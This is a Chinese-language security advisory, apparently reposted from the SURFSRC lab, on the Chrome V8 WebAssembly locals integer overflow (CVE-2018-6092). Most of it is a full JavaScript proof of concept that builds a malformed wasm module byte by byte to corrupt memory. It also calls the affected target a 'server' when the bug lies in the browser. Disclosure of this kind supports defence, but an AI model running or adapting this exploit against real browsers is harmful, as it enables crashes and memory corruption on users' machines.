漏洞预警| Google Chrome处理 WebAssembly Locals 时存在整数溢出漏洞

Posted 任子行

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞预警| Google Chrome处理 WebAssembly Locals 时存在整数溢出漏洞相关的知识,希望对你有一定的参考价值。


一、漏洞简介

  在Google Chrome处理WebAssembly Locals时,由于在校验整数长度的时候使用不恰当的方式,造成溢出漏洞,攻击者可构造特殊的JS造成服务器拒绝服务。


二、漏洞详情
CVE编号 CVE-2018-6092
漏洞类型 溢出攻击
威胁等级
影响版本 现目前版本


当使用v8解码器解码本地函数是,会执行以下判断:

if ((count + type_list->size()) > kV8MaxWasmFunctionLocals) {

        decoder->error(decoder->pc() - 1, "local count too large");

        return false;

      }


  在32位的平台中, 攻击者可绕过这个检测并进行一个整数溢出攻击。这类攻击通过将本地函数中的局部变量赋予一个很大的值,当局部变量被分配的时候会造成服务器内存被破坏,造成DoS攻击。


PoC:

var b2 = new Uint8Array( 171);

b2[0] = 0x0;

b2[1] = 0x61;

b2[2] = 0x73;

b2[3] = 0x6d;

b2[4] = 0x1;

b2[5] = 0x0;

b2[6] = 0x0;

b2[7] = 0x0;

b2[8] = 0x1;

b2[9] = 0xe;

b2[10] = 0x3;

b2[11] = 0x60;

b2[12] = 0x1;

b2[13] = 0x7f;

b2[14] = 0x0;

b2[15] = 0x60;

b2[16] = 0x0;

b2[17] = 0x0;

b2[18] = 0x60;

b2[19] = 0x2;

b2[20] = 0x7f;

b2[21] = 0x7f;

b2[22] = 0x1;

b2[23] = 0x7f;

b2[24] = 0x2;

b2[25] = 0x23;

b2[26] = 0x2;

b2[27] = 0x2;

b2[28] = 0x6a;

b2[29] = 0x73;

b2[30] = 0x3;

b2[31] = 0x6d;

b2[32] = 0x65;

b2[33] = 0x6d;

b2[34] = 0x2;

b2[35] = 0x0;

b2[36] = 0x1;

b2[37] = 0x7;

b2[38] = 0x69;

b2[39] = 0x6d;

b2[40] = 0x70;

b2[41] = 0x6f;

b2[42] = 0x72;

b2[43] = 0x74;

b2[44] = 0x73;

b2[45] = 0xd;

b2[46] = 0x69;

b2[47] = 0x6d;

b2[48] = 0x70;

b2[49] = 0x6f;

b2[50] = 0x72;

b2[51] = 0x74;

b2[52] = 0x65;

b2[53] = 0x64;

b2[54] = 0x5f;

b2[55] = 0x66;

b2[56] = 0x75;

b2[57] = 0x6e;

b2[58] = 0x63;

b2[59] = 0x0;

b2[60] = 0x0;

b2[61] = 0x3;

b2[62] = 0x3;

b2[63] = 0x2;

b2[64] = 0x1;

b2[65] = 0x2;

b2[66] = 0x7;

b2[67] = 0x1e;

b2[68] = 0x2;

b2[69] = 0xd;

b2[70] = 0x65;

b2[71] = 0x78;

b2[72] = 0x70;

b2[73] = 0x6f;

b2[74] = 0x72;

b2[75] = 0x74;

b2[76] = 0x65;

b2[77] = 0x64;

b2[78] = 0x5f;

b2[79] = 0x66;

b2[80] = 0x75;

b2[81] = 0x6e;

b2[82] = 0x63;

b2[83] = 0x0;

b2[84] = 0x1;

b2[85] = 0xa;

b2[86] = 0x61;

b2[87] = 0x63;

b2[88] = 0x63;

b2[89] = 0x75;

b2[90] = 0x6d;

b2[91] = 0x75;

b2[92] = 0x6c;

b2[93] = 0x61;

b2[94] = 0x74;

b2[95] = 0x65;

b2[96] = 0x0;

b2[97] = 0x2;

b2[98] = 0xa;

b2[99] = 0x47;

b2[100] = 0x2;

b2[101] = 0x6;

b2[102] = 0x0;

b2[103] = 0x41;

b2[104] = 0x2a;

b2[105] = 0x10;

b2[106] = 0x0;

b2[107] = 0xb;

b2[108] = 0x3e;

b2[109] = 0x1;

b2[110] = 0xff;

b2[111] = 0xff;

b2[112] = 0xff;

b2[113] = 0xff;

b2[114] = 0x0f;

b2[115] = 0x7f;

b2[116] = 0x20;

b2[117] = 0x0;

b2[118] = 0x20;

b2[119] = 0x1;

b2[120] = 0x41;

b2[121] = 0x4;

b2[122] = 0x6c;

b2[123] = 0x6a;

b2[124] = 0x21;

b2[125] = 0x2;

b2[126] = 0x2;

b2[127] = 0x40;

b2[128] = 0x3;

b2[129] = 0x40;

b2[130] = 0x20;

b2[131] = 0x0;

b2[132] = 0x20;

b2[133] = 0x2;

b2[134] = 0x46;

b2[135] = 0xd;

b2[136] = 0x1;

b2[137] = 0x41;

b2[138] = 0x2a;

b2[139] = 0x10;

b2[140] = 0x0;

b2[141] = 0x20;

b2[142] = 0x3;

b2[143] = 0x41;

b2[144] = 0xc4;

b2[145] = 0x0;

b2[146] = 0x20;

b2[147] = 0x0;

b2[148] = 0x36;

b2[149] = 0x2;

b2[150] = 0x0;

b2[151] = 0x41;

b2[152] = 0xc4;

b2[153] = 0x0;

b2[154] = 0x6a;

b2[155] = 0x21;

b2[156] = 0x3;

b2[157] = 0x20;

b2[158] = 0x0;

b2[159] = 0x41;

b2[160] = 0x4;

b2[161] = 0x6a;

b2[162] = 0x21;

b2[163] = 0x0;

b2[164] = 0xc;

b2[165] = 0x0;

b2[166] = 0xb;

b2[167] = 0xb;

b2[168] = 0x20;

b2[169] = 0x3;

b2[170] = 0xb;


function f(){print("in f");}

var memory = new WebAssembly.Memory({initial:1, maximum:1});

var mod = new WebAssembly.Module(b2);

var i = new WebAssembly.Instance(mod, { imports : {imported_func : f}, js : {mem : memory}});

i.exports.accumulate.call(0, 5);


三、修复方案

暂无修复方案,持续关注官网。

参考链接:

https://www.exploit-db.com/exploits/44860/

https://bugs.chromium.org/p/project-zero/issues/detail?id=1546


关于SURFSRC

  任子行网络安全攻防实验室(SURFSRC)成立于2017年,以网络安全攻防技术为核心,专注于网络安全技术研究及安全攻防体系搭建。

  实验室重点关注APT攻击与防御技术、恶意代码对抗、基于主机与网络的取证技术、网络恶意流量检测、二进制漏洞攻防、非接触式移动端漏洞与攻击(包括androidios平台上的Wi-Fi、蓝牙等)以及Web安全研究等前沿网络安全技术、网络攻防渗透、恶意攻击溯源等网络信息安全攻防技术研究与应用,洞察网络安全前沿威胁,提升企业运维安全效率,为企业网络信息安全护航。


以上是关于漏洞预警| Google Chrome处理 WebAssembly Locals 时存在整数溢出漏洞的主要内容,如果未能解决你的问题,请参考以下文章

漏洞预警:WordPress插件Events Manager 5.8.1.1存在XSS漏洞(CVE-2018-9020)

安全预警 ——WebSphere存在远程代码执行漏洞

预警Zabbix SQL注入漏洞 威胁预警通告

漏洞预警 | solr远程代码执行漏洞

令人惊叹的 CSS 漏洞攻击,Firefox 和 Chrome 中枪

关于Struts-2高危漏洞预警信息